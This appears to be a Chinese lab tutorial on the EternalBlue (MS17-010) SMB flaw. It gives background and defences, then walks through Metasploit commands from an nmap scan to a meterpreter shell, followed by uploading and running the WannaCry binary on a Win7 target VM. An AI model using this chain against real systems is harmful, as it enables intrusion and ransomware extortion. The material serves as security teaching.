一,永恒之蓝简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
二,漏洞原理
永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三,SMB协议
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
四,漏洞防御
1.禁用SMB1协议
2.打开Windows Update,或手动安装补丁
3.使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接
4.不要随意打开陌生的文件,链接
5.安装杀毒软件,及时更新病毒库
6.暂时关闭Server服务。
五,实验环境:Win7(靶机)和Kali Linux(攻击机);
1.准备靶机:Win7 64位 (IP: 192.168.227.136)--用ipconfig进行查询,实验前关闭win7防火墙(在win7的所有程序中的控制面板中设置)
2.准备攻击机:Kali 64位 (IP:192.168.227.132)--用ifconfig进行查询
3.保证两个虚拟机可以ping通
![](https://img-blog.csdnimg.cn/img_convert/dc6f69c0c397e626db7a1bab6b3986ee.png)
![](https://img-blog.csdnimg.cn/img_convert/06161483e847d35eec5bd1c6044fb52f.png)
六,漏洞复现
1.检测靶机主机和端口
使用nmap对靶机端口服务进行扫描,检测目标主机是否存活,以及445端口开放情况
nmap 192.168.227.136
![](https://img-blog.csdnimg.cn/img_convert/75833be63ed8b50fd185790bc52c6012.png)
可以看到:目标主机存活(host is up),且445端口开放
2.打开kail自带的Metasploit渗透工具
(Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端)
msfconsole
![](https://img-blog.csdnimg.cn/img_convert/aa1075a854c2e728280278a3debc5d9b.png)
3、输入永恒之蓝漏洞编号
永恒之蓝漏洞编号为ms17-010
search ms17-010
![](https://img-blog.csdnimg.cn/img_convert/c73b51f29bd7ac6b93760422cf9e115d.png)
可以看到返回了多条可利用的漏洞模块信息,永恒之蓝用到的是第3个和第0个。第3个是用来进行扫描的,扫描在这个网段里面哪一个主机是有这个漏洞的(scanner扫描器),第0个是永恒之蓝的攻击模块。
4.使用第3个扫描器进行辅助扫描测试。
use auxiliary/scanner/smb/smb_ms17_010
![](https://img-blog.csdnimg.cn/img_convert/1e13fcb853a7e0d33989ba7687a0f71e.png)
5.查看该漏洞模块所需的参数情况
show options
![](https://img-blog.csdnimg.cn/img_convert/0e0c898c3a017afab9c4aa97be2e6061.png)
结果展示:其中required下方显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
我们重点关注以下2个参数配置,哪个参数有问题就设置哪个:
RHOST(被攻击的目标地址-靶机地址);
RPORT(被攻击目标地址的端口-保证445端口开放);
6、设置靶机地址
由上图可知:只有RHOST未设置,其他参数均以自动获取,没有问题。所以我们只需设置靶机位置即可
set RHOST 192.168.227.136
![](https://img-blog.csdnimg.cn/img_convert/60a77740bd861d170766e42b4383b664.png)
7、进行检验
show options
![](https://img-blog.csdnimg.cn/img_convert/924f6ffabce402f5cd8588b93be8b005.png)
检验后无误即可进行下一步操作
8、发起攻击
run
![](https://img-blog.csdnimg.cn/img_convert/5c7738d697e95c8d4e5e463d4e640b2b.png)
显示“Host is likely VULNERABLE to MS17-010”-该主机很容易受到ms17-010的攻击,可以断定靶机存在永恒之蓝漏洞。
9、再次查看永恒之蓝漏洞
search ms17-010
![](https://img-blog.csdnimg.cn/img_convert/43a953131a5dfe02ef0a3e6e87e42545.png)
10、进入0模块,进行攻击
use exploit/windows/smb/ms17_010_eternalblue
![](https://img-blog.csdnimg.cn/img_convert/341a65c5f489c5ce0d1cafac13b1ae2b.png)
11、查看参数配置情况
show options
重点关注以下5个参数设置,哪个有问题就设置哪个
1.Payload(攻击载体) ;
2.RHOST(被攻击的目标地址-靶机ip);
3.RPORT(被攻击目标地址的端口-保证445开放);
4.LHOST(发起攻击的地址-kali的ip);
5.LPORT(发起攻击的端口-默认即可);
![](https://img-blog.csdnimg.cn/img_convert/3c8de90011444e74e19267f37db69345.png)
发现仅RHOST为空待设置,其它(payload/RPORT/LHOST/LPORT)均已获取且正确
12、设置RHOST
set RHOST 192.168.227.136
![](https://img-blog.csdnimg.cn/img_convert/640f20083f3c48688ec8bac587d3ca66.png)
13、再次检查
show options
![](https://img-blog.csdnimg.cn/img_convert/7576ced2cf74b2ee2fa46fa28591ed54.png)
检查无误
14,发起攻击
run
![](https://img-blog.csdnimg.cn/img_convert/2f4202397f16abd6a5710acb380968e2.png)
显示meterpreter >表明攻击成功 两个电脑已经建立了一个会话连接
15,进入靶机shell
shell
![](https://img-blog.csdnimg.cn/img_convert/5ede53464754c28d06007c3f147ce166.png)
若有乱码,输入chcp 65001即可
16,将wcry勒索病毒解压至kail的root文件夹下
![](https://img-blog.csdnimg.cn/img_convert/e7ea9bb4aa45e3c14fc1484b6e268917.png)
17,上传wcty.exe至靶机c盘
upload /root/wcry.exe c://wcry.exe
![](https://img-blog.csdnimg.cn/img_convert/0e48094e1f228a337c0da789baa5c5af.png)
若输入该命令无效,可在写完upload后按空格 将上图中的wcry.exe拉入命令行(本人是这么做的)
18,运行wcry.exe
excute -f c://wcry.exe
![](https://img-blog.csdnimg.cn/img_convert/43e92e513663c5c6f9915fd2880cc5f3.png)
运行成功
19,查看靶机
![](https://img-blog.csdnimg.cn/img_convert/143934331b6fd4ab001c99da459bbb2b.png)
攻击完成!